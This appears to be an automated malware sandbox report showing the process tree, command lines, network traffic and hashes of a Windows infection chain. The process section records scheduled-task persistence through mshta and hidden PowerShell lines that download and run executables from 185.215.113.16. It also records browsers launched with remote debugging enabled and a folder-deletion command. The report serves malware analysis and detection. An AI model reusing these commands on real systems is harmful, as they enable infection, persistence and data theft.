PID 1828 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe
PID 1828 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe
PID 1828 wrote to memory of 4992 N/A C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe
PID 4992 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\cmd.exe
PID 4992 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\cmd.exe
PID 4992 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\cmd.exe
PID 4992 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\mshta.exe
PID 4992 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\mshta.exe
PID 4992 wrote to memory of 1232 N/A C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe C:\Windows\SysWOW64\mshta.exe
PID 3976 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3976 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 3976 wrote to memory of 3044 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1232 wrote to memory of 1960 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 1960 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1232 wrote to memory of 1960 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3380 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3380 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 1432 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4072 wrote to memory of 4596 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe

"C:\Users\Admin\AppData\Local\Temp\f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091646001\HsDTj78.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091668001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4592 -ip 4592

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 152

C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe

"C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe"

C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe

"C:\Users\Admin\AppData\Local\Temp\1091693101\db4b761fdf.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /create /tn 0XhcbmanOzW /tr "mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn 0XhcbmanOzW /tr "mshta C:\Users\Admin\AppData\Local\Temp\G9uGgmPmK.hta" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd14fecc40,0x7ffd14fecc4c,0x7ffd14fecc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2364 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2372 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3220 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3244 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4452,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4532 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4244,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4252 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091694021\am_no.cmd" any_word

C:\Windows\SysWOW64\timeout.exe

timeout /t 2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4816,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4948 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4524,i,12054333960719281513,18187835959162424228,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4688 /prefetch:8

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "jWtzpmatznG" /tr "mshta \"C:\Temp\9undwL0Qa.hta\"" /sc minute /mo 25 /ru "Admin" /f

C:\Windows\SysWOW64\mshta.exe

mshta "C:\Temp\9undwL0Qa.hta"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd14ff46f8,0x7ffd14ff4708,0x7ffd14ff4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2016 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2424 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2672 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe

"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1992,14456508370141899934,16199755733759575714,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4064 /prefetch:1

C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE

"C:\Users\Admin\AppData\Local\Temp7WTXMUD863LVUFTULBPMQCQEHKPB5PQ1.EXE"

C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe

"C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\3ozmo" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 10

C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe

"C:\Users\Admin\AppData\Local\Temp\1091744001\b205fd23e0.exe"

C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe

"C:\Users\Admin\AppData\Local\Temp\1091745001\31a8d2ea41.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe

"C:\Users\Admin\AppData\Local\Temp\1091747001\d7289d778f.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe

"C:\Users\Admin\AppData\Local\Temp\1091749001\4629fe53b0.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe

"C:\Users\Admin\AppData\Local\Temp\1091751001\KsqTMuf.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4932 -ip 4932

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 808

C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe

"C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe"

C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe

"C:\Users\Admin\AppData\Local\Temp\1091753001\HsDTj78.exe"

Network

Country Destination Domain Proto
RU 185.215.113.43:80 185.215.113.43 tcp
RU 185.215.113.75:80 185.215.113.75 tcp
US 8.8.8.8:53 advertised.life udp
US 104.21.94.161:443 advertised.life tcp
US 8.8.8.8:53 uncertainyelemz.bet udp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
DE 109.120.178.136:80 109.120.178.136 tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 fua.4t.com udp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 2.23.210.82:80 e6.o.lencr.org tcp
RU 185.215.113.16:80 185.215.113.16 tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 ogads-pa.googleapis.com udp
GB 172.217.169.10:443 ogads-pa.googleapis.com udp
GB 172.217.169.10:443 ogads-pa.googleapis.com tcp
US 8.8.8.8:53 play.google.com udp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
GB 142.250.178.14:443 play.google.com udp
GB 142.250.178.14:443 play.google.com tcp
US 8.8.8.8:53 clients2.google.com udp
GB 172.217.169.78:443 clients2.google.com udp
GB 172.217.169.78:443 clients2.google.com tcp
N/A 224.0.0.251:5353 udp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
RU 185.215.113.16:80 185.215.113.16 tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
N/A 127.0.0.1:9223 tcp
N/A 127.0.0.1:9223 tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 185.198.234.185:80 cobolrationumelawrtewarms.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 8.8.8.8:53 pirtyoffensiz.bet udp
US 104.21.42.12:443 pirtyoffensiz.bet tcp
DE 94.130.190.206:443 fua.4t.com tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
NL 185.156.73.73:80 185.156.73.73 tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 breakfasutwy.cyou udp
US 8.8.8.8:53 importenptoc.com udp
US 8.8.8.8:53 voicesharped.com udp
US 8.8.8.8:53 inputrreparnt.com udp
US 8.8.8.8:53 torpdidebar.com udp
US 8.8.8.8:53 rebeldettern.com udp
US 8.8.8.8:53 actiothreaz.com udp
US 8.8.8.8:53 garulouscuto.com udp
US 8.8.8.8:53 breedertremnd.com udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 outlinedtrai.bet udp
US 172.67.218.33:443 outlinedtrai.bet tcp
US 104.21.94.161:443 advertised.life tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp
US 104.21.64.1:443 uncertainyelemz.bet tcp

Files

memory/428-0-0x00000000008C0000-0x0000000000D89000-memory.dmp

memory/428-1-0x0000000077014000-0x0000000077016000-memory.dmp

memory/428-2-0x00000000008C1000-0x0000000000929000-memory.dmp

memory/428-3-0x00000000008C0000-0x0000000000D89000-memory.dmp

memory/428-4-0x00000000008C0000-0x0000000000D89000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

MD5 78ec3bb0db3cee811be50f99dd89e2fe
SHA1 1ec0122be4458914a8b07c7b0bf34faf47d14c19
SHA256 f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5
SHA512 d36b32948ad76a558bbb3dbcbbdfeb911f581ab59b4a7502c09e5b4479b0fe9976cd473870f7dd7717da5c2639817c9990388d39f42e712410533b04893da082

memory/428-16-0x00000000008C0000-0x0000000000D89000-memory.dmp

memory/428-18-0x00000000008C1000-0x0000000000929000-memory.dmp

memory/1828-19-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1828-20-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1828-21-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1828-22-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1828-23-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1828-24-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1828-25-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1828-26-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1432-28-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1432-29-0x0000000000430000-0x00000000008F9000-memory.dmp

memory/1432-31-0x0000000000430000-0x00000000008F9000-memory.dmp

